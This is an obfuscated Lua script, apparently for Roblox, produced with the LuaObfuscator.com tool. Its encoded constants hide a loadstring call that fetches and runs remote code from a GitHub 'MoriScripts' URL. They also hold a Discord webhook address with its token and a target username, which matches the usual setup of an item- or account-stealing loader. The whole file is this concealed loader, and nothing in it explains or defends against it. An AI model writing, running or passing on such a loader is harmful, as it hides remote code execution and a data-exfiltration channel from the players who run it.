--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (12 -9) );v19=v19 + 4 + (117 -(32 + 85)) ;return (v37 * (23917454 -7140238)) + (v36 * (66601 -(67 + 1 + 997))) + (v35 * (1526 -(226 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=103 -(17 + 86) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==0) then v39=0;v40=nil;v38=1 + 0 ;end if (v38~=4) then else while true do if ((0 -0)==v39) then local v95=0;while true do if (v95==(1 -0)) then v39=2 -1 ;break;end if (v95~=0) then else v40=0;v41=nil;v95=1;end end end if (v39~=(167 -(122 + 44))) then else local v96=0 -0 ;while true do if (v96==(0 -0)) then v42=nil;v43=nil;v96=1785 -(599 + 1185) ;end if (v96==(1 + 0)) then v39=2;break;end end end if (v39~=(3 + 0)) then else v46=nil;while true do if (v40==2) then for v103=1,v24() do local v104=574 -(507 + 67) ;local v105;local v106;while true do if (v104==(1749 -(1013 + 736))) then v105=0 + 0 ;v106=nil;v104=1;end if ((2 -1)==v104) then while true do if (v105~=(1257 -(1043 + 214))) then else v106=v22();if (v21(v106,3 -2 ,3 -2 )==(867 -(550 + 317))) then local v173=0;local v174;local v175;local v176;local v177;local v178;local v179;while true do if (v173~=(1212 -(323 + 889))) then else v174=0;v175=nil;v173=1 -0 ;end if (v173~=(1 -0)) then else v176=nil;v177=nil;v173=5 -3 ;end if (v173==(582 -(361 + 219))) then v178=nil;v179=nil;v173=3;end if (3~=v173) then else while true do if ((322 -(53 + 267))~=v174) then else v179=nil;while true do if (v175~=2) then else while true do if (v176~=1) then else local v185=0;local v186;local v187;while true do if (v185~=(0 + 0)) then else v186=285 -(134 + 151) ;v187=nil;v185=1;end if (v185==1) then while true do if (v186==(982 -(18 + 964))) then v187=0 -0 ;while true do if (v187==(1665 -(970 + 695))) then local v197=0 + 0 ;while true do if (v197==(0 -0)) then v179={v23(),v23(),nil,nil};if (v177==(0 -0)) then local v200=0;local v201;while true do if (v200==0) then v201=0 -0 ;while true do if (v201==(738 -(542 + 196))) then v179[3]=v23();v179[1828 -(1195 + 629) ]=v23();break;end end break;end end elseif (v177==(1 -0)) then v179[2 + 1 ]=v24();elseif (v177==(1 + 1)) then v179[244 -(187 + 54) ]=v24() -((782 -(162 + 618))^(1567 -(1126 + 425))) ;elseif (v177~=(408 -(118 + 287))) then else local v210=0 + 0 ;local v211;while true do if (v210~=(0 + 0)) then else v211=0 -0 ;while true do if (v211==0) then v179[3]=v24() -(2^16) ;v179[4]=v23();break;end end break;end end end v197=1;end if (v197==(1 -0)) then v187=1 + 0 ;break;end end end if (1~=v187) then else v176=1123 -(118 + 1003) ;break;end end break;end end break;end end end if (0~=v176) then else local v188=0 -0 ;local v189;while true do if (v188~=0) then else v189=1636 -(1373 + 263) ;while true do if (1==v189) then v176=378 -(142 + 235) ;break;end if (v189==(1000 -(451 + 549))) then local v196=0 + 0 ;while true do if (v196~=(1 + 0)) then else v189=1 -0 ;break;end if (v196==(0 + 0)) then local v198=0 -0 ;while true do if (v198==(1 -0)) then v196=1;break;end if (v198~=(0 + 0)) then else v177=v21(v106,2 + 0 ,6 -3 );v178=v21(v106,4,1390 -(746 + 638) );v198=1 + 0 ;end end end end end end break;end end end if (v176~=2) then else local v190=0;local v191;local v192;while true do if ((1 -0)~=v190) then else while true do if (v191==(0 -0)) then v192=0;while true do if ((1 + 0)~=v192) then else v176=344 -(218 + 123) ;break;end if (v192==0) then local v199=0;while true do if (v199~=(754 -(239 + 514))) then else v192=1582 -(1535 + 46) ;break;end if (v199~=(1329 -(797 + 532))) then else if (v21(v178,1 + 0 ,1)~=(1 + 0)) then else v179[2]=v46[v179[562 -(306 + 254) ]];end if (v21(v178,4 -2 ,2)~=(1203 -(373 + 829))) then else v179[734 -(476 + 255) ]=v46[v179[1 + 2 ]];end v199=1131 -(369 + 761) ;end end end end break;end end break;end if (v190~=(0 + 0)) then else v191=0 -0 ;v192=nil;v190=1 -0 ;end end end if (v176==(241 -(64 + 174))) then if (v21(v178,1 + 2 ,1470 -(899 + 568) )==(1 + 0)) then v179[4]=v46[v179[9 -5 ]];end v41[v103]=v179;break;end end break;end if (v175~=(603 -(268 + 335))) then else local v183=0;while true do if (v183~=0) then else v176=216 -(42 + 174) ;v177=nil;v183=291 -(60 + 230) ;end if (v183~=(573 -(426 + 146))) then else v175=1 + 0 ;break;end end end if (v175~=(1457 -(282 + 1174))) then else local v184=811 -(569 + 242) ;while true do if (v184~=(0 -0)) then else v178=nil;v179=nil;v184=1581 -(1183 + 397) ;end if (v184==1) then v175=1 + 1 ;break;end end end end break;end if ((0 + 0)==v174) then v175=1024 -(706 + 318) ;v176=nil;v174=1976 -(1913 + 62) ;end if (v174==1) then local v182=0 + 0 ;while true do if (v182~=0) then else v177=nil;v178=nil;v182=1252 -(721 + 530) ;end if (v182~=(1272 -(945 + 326))) then else v174=4 -2 ;break;end end end end break;end end end break;end end break;end end end for v107=1,v24() do v42[v107-(1 + 0) ]=v29();end return v44;end if (v40==(701 -(271 + 429))) then local v101=0 + 0 ;while true do if (v101==(0 + 0)) then v45=v24();v46={};v101=1 -0 ;end if (v101~=(5 -3)) then else v40=1502 -(1408 + 92) ;break;end if (v101==(1087 -(461 + 625))) then for v145=1,v45 do local v146=0 + 0 ;local v147;local v148;local v149;while true do if (v146~=(476 -(41 + 435))) then else local v172=1288 -(993 + 295) ;while true do if (v172~=(0 + 0)) then else v147=0;v148=nil;v172=1172 -(418 + 753) ;end if ((1 + 0)==v172) then v146=1126 -(936 + 189) ;break;end end end if (v146~=(1 + 0)) then else v149=nil;while true do if (v147==(1614 -(1565 + 48))) then if (v148==(1 + 0)) then v149=v22()~=0 ;elseif (v148==(1 + 1)) then v149=v25();elseif (v148~=3) then else v149=v26();end v46[v145]=v149;break;end if (v147~=(0 + 0)) then else local v181=267 -(176 + 91) ;while true do if ((0 -0)~=v181) then else v148=v22();v149=nil;v181=530 -(406 + 123) ;end if (v181==(1770 -(1749 + 20))) then v147=1 + 0 ;break;end end end end break;end end end v44[1325 -(1249 + 73) ]=v22();v101=1 + 1 ;end end end if (v40==(1145 -(466 + 679))) then local v102=1875 -(157 + 1718) ;while true do if (v102==(4 -2)) then v40=1;break;end if (v102==0) then v41={};v42={};v102=2 -1 ;end if (v102==(3 -2)) then v43={};v44={v41,v42,nil,v43};v102=5 -3 ;end end end end break;end if (v39~=(5 -3)) then else local v97=0;while true do if (v97~=(0 -0)) then else v44=nil;v45=nil;v97=1;end if (1==v97) then v39=3;break;end end end end break;end if (v38==(4 -2)) then v43=nil;v44=nil;v38=3;end if ((115 -(4 + 110))~=v38) then else v41=nil;v42=nil;v38=586 -(57 + 527) ;end if (v38==3) then v45=nil;v46=nil;v38=1431 -(41 + 1386) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1 -(0 + 0) ;local v50=(v21(v48,2 -1 ,1247 -(322 + 905) ) * ((613 -(602 + 9))^32)) + v47 ;local v51=v21(v48,(2900 -(1121 + 569)) -(449 + 740) ,903 -((1040 -(22 + 192)) + 46) );local v52=((v21(v48,715 -(483 + 200) )==(948 -(245 + 702))) and  -(3 -2)) or 1 ;if (v51==(0 + 0)) then if (v50==(1898 -(260 + 1638))) then return v52 * 0 ;else local v90=440 -(382 + 58) ;while true do if (v90==(0 -0)) then v51=1 + 0 ;v49=0 -0 ;break;end end end elseif (v51==2047) then return ((v50==(0 -0)) and (v52 * (1/0))) or (v52 * NaN) ;end return v8(v52,v51-(2228 -(902 + 303)) ) * (v49 + (v50/((3 -1)^(125 -(1536 -(1404 + 59)))))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 -0) );v19=v19 + v53 ;local v55={};for v67=766 -(468 + 297) , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0;local v58;local v59;while true do if (v57==(563 -(334 + (464 -(141 + 95))))) then return (v59 * 256) + v58 ;end if (v57==(0 -(0 + 0))) then v58,v59=v1(v16,v19,v19 + (4 -2) );v19=v19 + (2 -0) ;v57=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v60,16));if v20 then local v98=v5(v86,v20);v20=nil;return v98;else return v86;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then v63[v81[3]]=v79[v81[2]];elseif (v82==1) then v79[v81[2]]=v63[v81[3]];else local v111=0;local v112;local v113;while true do if (v111==0) then v112=v81[2];v113=v79[v81[3]];v111=1;end if (v111==1) then v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];break;end end end elseif (v82<=3) then do return;end elseif (v82==4) then v73=v81[3];else v79[v81[2]]=v81[3];end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]();elseif (v82==7) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else local v117=v81[2];v79[v117]=v79[v117](v13(v79,v117 + 1 ,v74));end elseif (v82<=10) then if (v82>9) then v79[v81[2]]=v81[3]~=0 ;else local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==0) then v121=v81[2];v122,v123=v72(v79[v121](v13(v79,v121 + 1 ,v81[3])));v120=1;end if (v120==1) then v74=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==2) then for v169=v121,v74 do v124=v124 + 1 ;v79[v169]=v122[v124];end break;end end end elseif (v82>11) then local v125;local v126,v127;local v128;local v129;v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v129=v81[2];v128=v79[v81[3]];v79[v129 + 1 ]=v128;v79[v129]=v128[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v129=v81[2];v126,v127=v72(v79[v129](v13(v79,v129 + 1 ,v81[3])));v74=(v127 + v129) -1 ;v125=0;for v140=v129,v74 do v125=v125 + 1 ;v79[v140]=v126[v125];end v73=v73 + 1 ;v81=v69[v73];v129=v81[2];v79[v129]=v79[v129](v13(v79,v129 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else local v139=0;while true do if (v139==4) then v73=v81[3];break;end if (v139==3) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v139=4;end if (v139==0) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v139=1;end if (v139==1) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v139=2;end if (v139==2) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v139=3;end end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O006E337266616C6578030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313532373533393037332O363336333238362F4C3O6F6E704F3354684158346551693268714D444845506F6D705462694E79316C2O4A694E59445345345F666E434536634B4C5636535672416C366479436F3941453600173O0012053O00013O0026073O000E00010002002O043O000E0001001205000100043O00120C000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026073O000100010001002O043O00010001001205000100043O00120B000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
